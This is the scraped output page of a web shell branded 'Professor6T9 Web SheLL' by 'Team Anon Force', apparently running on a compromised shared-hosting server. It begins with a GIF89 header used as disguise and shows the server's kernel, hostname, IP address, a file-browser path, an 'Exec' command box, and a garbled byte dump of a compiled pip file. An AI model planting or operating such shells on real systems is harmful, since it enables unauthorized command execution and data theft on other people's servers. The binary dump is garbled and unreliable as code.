GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
alt
/
python37
/
lib
/
python3.7
/
site-packages
/
pip
/
_internal
/
operations
/
build
/
__pycache__
[ HOME ]
Exec
Submit
wheel.cpython-37.pyc
B ��Re� � @ s^ d dl Z d dlZd dlmZ d dlmZ erHd dlmZmZ d dl m Z e �e�Z dd� ZdS )� N)�runner_with_spinner_message)�MYPY_CHECK_RUNNING)�List�Optional)�Pep517HookCallerc C s� |dk st �|r t�d| � dS yBt�d|� td�| ��}|�|�� |j||d�}W dQ R X W n tk r� t�d| � dS X t j �||�S )z�Build one InstallRequirement using the PEP 517 build process. Returns path to wheel if successfully built. Otherwise, returns None. NzFCannot build wheel for %s using PEP 517 when --build-option is presentzDestination directory: %szBuilding wheel for {} (PEP 517))�metadata_directoryzFailed building wheel for %s)�AssertionError�logger�error�debugr �format�subprocess_runner�build_wheel� Exception�os�path�join)�name�backendr � build_options�tempd�runner� wheel_name� r ��/builddir/build/BUILDROOT/alt-python37-pip-20.2.4-6.el8.x86_64/opt/alt/python37/lib/python3.7/site-packages/pip/_internal/operations/build/wheel.py�build_wheel_pep517 s"